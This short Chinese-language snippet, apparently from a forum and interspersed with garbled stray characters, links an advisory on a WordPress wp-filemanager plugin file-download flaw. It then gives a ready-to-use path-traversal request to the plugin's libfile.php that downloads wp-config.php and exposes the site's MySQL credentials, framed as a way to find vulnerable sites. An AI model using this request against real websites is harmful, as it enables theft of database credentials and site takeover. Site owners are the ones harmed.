洞详解:http://packetstormsecurity.com/f ... -File-Download.html* N2 `4 I: Z, u; H; j8 Y
0 k3 E, U: f4 G b) C6 l# `查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。& _! y- X% ~, O- k2 B
|